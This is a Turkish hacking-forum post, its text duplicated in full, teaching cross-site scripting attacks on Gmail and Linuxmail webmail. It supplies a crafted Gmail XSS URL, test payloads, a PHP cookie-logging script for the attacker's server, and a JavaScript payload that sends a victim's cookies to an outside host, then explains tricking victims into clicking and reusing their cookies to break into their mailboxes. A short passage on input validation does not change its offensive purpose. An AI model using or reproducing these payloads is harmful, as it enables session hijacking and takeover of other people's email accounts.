GMAİL XSS
S.A.
ilk önce XSS saldırısı nedir onu acıklayalım..
Cross Site Scripting olarak adlandırılır..
victim’in üye olduğu herhangi bir sitedeki hesabının, owner tarafından belirli kodlarla scriptlere gömülen saldırı türüdür.. Hackerın deneme-yanılma bir tür brutue attack yaparak bulmasıyla meydana gelir..
Hacker, başka bir scriptten, domainden veya hesaptan, XSS açığının bulunduğu siteye session bilgilerini ele geçirmesine ortam sağlar..
bu XSS (Cross Site Scripting) açığı daha çok Mail sistemlerinde karşımıza çıkar.. Bunun en büyük sebebi ise; XSS açığına günümüzdeki bir çok web uygulamalarında rastlanması ve ücretsiz güvenlik açığı tarama yazılımları ile kolayca bulunabilmesidir..
Bu bug’a en büyük çözüm ise; XSS (Cross Site Scripting) açığı bulunan scriptin yazılım kodlarının düzeltilmesidir.. Kullanılan scriptte, user’lardan alınan girdiler, mutlaka kontrol edilmelidir.. Bunun sayesinde web-mail güvenlik açıklarına sebebiyet veren; XSS (Cross Site Scripting) - SQL Injection - Buffer 0werflow gibi bug’lar rahatça fixlenebilecektir..
Örnek verecek olursak; hackerın XSS veya SQL Inj. için kullanacağımız kodlar arasında % > < ile başlayan karakterler bulunmaktadır.. Bu tür karakterlerin olduğu scriptlerde girilen verinin encode edilmesi gerekebilir.. Yani kısaca kullanılan "%" karakteri yerine v harfi uygulanırsa, böylece hacker başarısız olur..
Gelelim son olarak GOOGLE ürünü olan gmail.com servisinde XSS Açığına..
gmail.com hesabına sahip victim’i hacklemek için; kurbana vereceğim kodları yedirmeniz gerekmektedir.. Bu kodu victim’e yedirmek size kalmış tabii ki.. Herhangi bir siteye gömerekte yollayabilirsiniz, kullanılan scripte (ASP, PHP, vs) encode ederekte gömebilirsiniz veya sitenizde iframe olarak verebilirsiniz...
Kod;
http://www.google.com/reviews/w/confirm?url=http://volqan.us/root/index.php?"><SCRİPT>/XSS src= "http://sitendeki-JS-dosyanin adresi> <SCRİPT>&q=000&c=http://www.google.com/searchhl=en&q=000&btnG=Search&submit=VoLqaN">
(URL’leri kendi adresinize göre düzeltiniz)
Kurbana yedirdikten sonra gelen cerezleri, kendi cerezlerinizle editleyerek victim’in mailine giriş yapabilirsiniz..
Not: js dosya için, sniffer’ınızın olması gerekli
Kısa bir süre önce gmail hesabımı bu yolla kaptırmıstım : ) demek ki iş’e yarıyormus, neyse mühim olan "niçin hacklendim" değil "nasıl hacklendim"
GOOGLE’a ait gmail’deki bu açığın kapanması an meselesidir.. Hotmail gibi aylarca süren bir XSS açığı değil.. Bknz: En son bulunan Gmail XSS Açığı, 2 günde fixlenmişti.
Linuxmail XSS
s.a Dostlar,
Linuxmail’in güvenlik açıklarından faydalanma hakkında biraz bilgi vericem. ( Kısa Ve ÖZ )
Linuxmail.org adresinde bulunan XSS ( Cross Site Scripting ):
http://mymail.linuxmail.org/scripts/...owlist&mode=//
Kurbana Gönderilecek Linkin içindeki xss açıgımızın sonuna eklenecek kod:
kodun saglamlıgı için adres olarak veriyorum
ÖNEMLI: Arkadaslar son verdigim kodu önce decode edip düzenliyeceksiniz ve sonra tekrar encode etmeniz gerekmektedir. yoksa cookies ( çerezler ) sniffer ınıza gelmez
Kendinize göre decode ve encode yide Buradan yapabilirsiniz.
Kurbanın Cookies i çektikten sonra Operada [URL="http://www.linuxmail.org/"]http://www.linuxmail.org [url]https://tik.lat/9A28G Simdi Buradan ne anliyoruz id numarasi yada haber numarasi diyelim 12 olan yaziyi yazdir simdi onun üzerinde az oynarsak belki xss bulabiliriz ilk önce test için java scriptteki alert komutunu test edelim nasil yapicaz http://www.hedef.com/haber.php?yazdir=**********alert("Xss");</script>
Burada eger xss yiyosa Ekranda Xss seklinde bi uyari görürüz bu nedemek olur tabiiki bu sitede java script çalistirabiliyoruz ozaman ne yapmamiz gerekli devaminda cookie çalmaya çalismaliyiz peki java scriptte cookie kodu ne
Kod:
**********alert("********.cookie");</script>
bunu sitenin sonuna söyle yazdigimizda ne olucak dersiniz http://www.hedef.com/haber.php?yazdir=**********alert(********.cookie);</script>
tabii ki deminki Xss diye uyari gördügümüz ekranda Kendi cookiemizi görücez peki baskasinin cookiesini almak için ne yapmali ilk önce bi sniffer hazirlanmali sniffer hazirlamakla ilgili döküman ileride ayrintili yazicam ama amacimiz su anda sadece isimizi su kodlar görüyoro
Kod:
<?php
$cookie = $_GET[’cookie’];
$fp = fopen(’log.php’, ’a’);
fwrite($fp, ’Cookie: ’.$cookie.’<br>’);
fclose($fp);
?>
bu kodu bi ftpye atip cal.php olarak kaydedicez Garanti olsun Chmod 777 de verelim hadi (Uha) ardindan ise java script yardimiyla diger kisilerin cookielerini çalmaya geldi onuda javadaki küçük bir oyunla halledicez
Kod:
******************.href=’ https://tik.lat/X9xFe ’%2Bescape(********.cookie)</script>
bunu sitemizin = (Esittir)’inden sonra ekliyoruz ve cookiesini çalmak istedigimiz kisinin tiklamasini sagliyoruz burasi sizin yaraticiliginiza kalmis bunu nasil yaparsiniz siz düsünün bi iki mantik göstericek olursam mesela bir web sitesi hazirlayin we tiklatmali bi sekilde yapin yani nasil tarif edeyim biri siteye girdiginde sanki o linke tiklamis gibi olsun (en basit anlatimi) yanii cokiesi olussun e tiklatma adresinede bizim kendi cookie çalma kodumuzu yazarsak elbetteki cookiemiz kendi sitemizdeki cal.php de gözükecekdir.
Cookieyi Çaldik
ee Napicaz çaldik adamin kimligini ama kendimi gizleyip içeriye nasil giricem bilmiyorum basit cookie editör veya proxomitron gibi programlar yardimiyla kolayca girebilirsiniz
Dökümanin Asil Amaci Xss ve Cookie iliskisi oldugundan dolayi fazla Detaya girmedim dicekdim de yine bayagi sey anlattigimi düsünüyorum ama önemli olan benim anlatmam degil sizin anlamaniz anladiysaniz benim için sorun yok anlamadiginiz kismi bu baslik altindan sorabilirsiniz.
[/COLOR][/B]
S.A.
ilk önce XSS saldırısı nedir onu acıklayalım..
Cross Site Scripting olarak adlandırılır..
victim’in üye olduğu herhangi bir sitedeki hesabının, owner tarafından belirli kodlarla scriptlere gömülen saldırı türüdür.. Hackerın deneme-yanılma bir tür brutue attack yaparak bulmasıyla meydana gelir..
Hacker, başka bir scriptten, domainden veya hesaptan, XSS açığının bulunduğu siteye session bilgilerini ele geçirmesine ortam sağlar..
bu XSS (Cross Site Scripting) açığı daha çok Mail sistemlerinde karşımıza çıkar.. Bunun en büyük sebebi ise; XSS açığına günümüzdeki bir çok web uygulamalarında rastlanması ve ücretsiz güvenlik açığı tarama yazılımları ile kolayca bulunabilmesidir..
Bu bug’a en büyük çözüm ise; XSS (Cross Site Scripting) açığı bulunan scriptin yazılım kodlarının düzeltilmesidir.. Kullanılan scriptte, user’lardan alınan girdiler, mutlaka kontrol edilmelidir.. Bunun sayesinde web-mail güvenlik açıklarına sebebiyet veren; XSS (Cross Site Scripting) - SQL Injection - Buffer 0werflow gibi bug’lar rahatça fixlenebilecektir..
Örnek verecek olursak; hackerın XSS veya SQL Inj. için kullanacağımız kodlar arasında % > < ile başlayan karakterler bulunmaktadır.. Bu tür karakterlerin olduğu scriptlerde girilen verinin encode edilmesi gerekebilir.. Yani kısaca kullanılan "%" karakteri yerine v harfi uygulanırsa, böylece hacker başarısız olur..
Gelelim son olarak GOOGLE ürünü olan gmail.com servisinde XSS Açığına..
gmail.com hesabına sahip victim’i hacklemek için; kurbana vereceğim kodları yedirmeniz gerekmektedir.. Bu kodu victim’e yedirmek size kalmış tabii ki.. Herhangi bir siteye gömerekte yollayabilirsiniz, kullanılan scripte (ASP, PHP, vs) encode ederekte gömebilirsiniz veya sitenizde iframe olarak verebilirsiniz...
Kod;
http://www.google.com/reviews/w/confirm?url=http://volqan.us/root/index.php?"><SCRİPT>/XSS src= "http://sitendeki-JS-dosyanin adresi> <SCRİPT>&q=000&c=http://www.google.com/searchhl=en&q=000&btnG=Search&submit=VoLqaN">
(URL’leri kendi adresinize göre düzeltiniz)
Kurbana yedirdikten sonra gelen cerezleri, kendi cerezlerinizle editleyerek victim’in mailine giriş yapabilirsiniz..
Not: js dosya için, sniffer’ınızın olması gerekli
Kısa bir süre önce gmail hesabımı bu yolla kaptırmıstım : ) demek ki iş’e yarıyormus, neyse mühim olan "niçin hacklendim" değil "nasıl hacklendim"
GOOGLE’a ait gmail’deki bu açığın kapanması an meselesidir.. Hotmail gibi aylarca süren bir XSS açığı değil.. Bknz: En son bulunan Gmail XSS Açığı, 2 günde fixlenmişti.
Linuxmail XSS
s.a Dostlar,
Linuxmail’in güvenlik açıklarından faydalanma hakkında biraz bilgi vericem. ( Kısa Ve ÖZ )
Linuxmail.org adresinde bulunan XSS ( Cross Site Scripting ):
http://mymail.linuxmail.org/scripts/...owlist&mode=//
Kurbana Gönderilecek Linkin içindeki xss açıgımızın sonuna eklenecek kod:
kodun saglamlıgı için adres olarak veriyorum
ÖNEMLI: Arkadaslar son verdigim kodu önce decode edip düzenliyeceksiniz ve sonra tekrar encode etmeniz gerekmektedir. yoksa cookies ( çerezler ) sniffer ınıza gelmez
Kendinize göre decode ve encode yide Buradan yapabilirsiniz.
Kurbanın Cookies i çektikten sonra Operada [URL="http://www.linuxmail.org/"]http://www.linuxmail.org [url]https://tik.lat/9A28G Simdi Buradan ne anliyoruz id numarasi yada haber numarasi diyelim 12 olan yaziyi yazdir simdi onun üzerinde az oynarsak belki xss bulabiliriz ilk önce test için java scriptteki alert komutunu test edelim nasil yapicaz http://www.hedef.com/haber.php?yazdir=**********alert("Xss");</script>
Burada eger xss yiyosa Ekranda Xss seklinde bi uyari görürüz bu nedemek olur tabiiki bu sitede java script çalistirabiliyoruz ozaman ne yapmamiz gerekli devaminda cookie çalmaya çalismaliyiz peki java scriptte cookie kodu ne
Kod:
**********alert("********.cookie");</script>
bunu sitenin sonuna söyle yazdigimizda ne olucak dersiniz http://www.hedef.com/haber.php?yazdir=**********alert(********.cookie);</script>
tabii ki deminki Xss diye uyari gördügümüz ekranda Kendi cookiemizi görücez peki baskasinin cookiesini almak için ne yapmali ilk önce bi sniffer hazirlanmali sniffer hazirlamakla ilgili döküman ileride ayrintili yazicam ama amacimiz su anda sadece isimizi su kodlar görüyoro
Kod:
<?php
$cookie = $_GET[’cookie’];
$fp = fopen(’log.php’, ’a’);
fwrite($fp, ’Cookie: ’.$cookie.’<br>’);
fclose($fp);
?>
bu kodu bi ftpye atip cal.php olarak kaydedicez Garanti olsun Chmod 777 de verelim hadi (Uha) ardindan ise java script yardimiyla diger kisilerin cookielerini çalmaya geldi onuda javadaki küçük bir oyunla halledicez
Kod:
******************.href=’ https://tik.lat/X9xFe ’%2Bescape(********.cookie)</script>
bunu sitemizin = (Esittir)’inden sonra ekliyoruz ve cookiesini çalmak istedigimiz kisinin tiklamasini sagliyoruz burasi sizin yaraticiliginiza kalmis bunu nasil yaparsiniz siz düsünün bi iki mantik göstericek olursam mesela bir web sitesi hazirlayin we tiklatmali bi sekilde yapin yani nasil tarif edeyim biri siteye girdiginde sanki o linke tiklamis gibi olsun (en basit anlatimi) yanii cokiesi olussun e tiklatma adresinede bizim kendi cookie çalma kodumuzu yazarsak elbetteki cookiemiz kendi sitemizdeki cal.php de gözükecekdir.
Cookieyi Çaldik
ee Napicaz çaldik adamin kimligini ama kendimi gizleyip içeriye nasil giricem bilmiyorum basit cookie editör veya proxomitron gibi programlar yardimiyla kolayca girebilirsiniz
Dökümanin Asil Amaci Xss ve Cookie iliskisi oldugundan dolayi fazla Detaya girmedim dicekdim de yine bayagi sey anlattigimi düsünüyorum ama önemli olan benim anlatmam degil sizin anlamaniz anladiysaniz benim için sorun yok anlamadiginiz kismi bu baslik altindan sorabilirsiniz.
[/COLOR][/B]